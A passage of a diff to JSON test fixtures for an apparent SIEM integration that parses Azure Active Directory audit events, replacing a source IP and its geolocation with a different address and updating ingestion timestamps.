Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -10289,25 +9407,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -10321,7 +9421,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -10457,7 +9557,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -10469,12 +9569,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036386800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125127Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -10500,25 +9600,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -10532,7 +9614,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -10671,7 +9753,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -10683,12 +9765,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036391100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125133800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 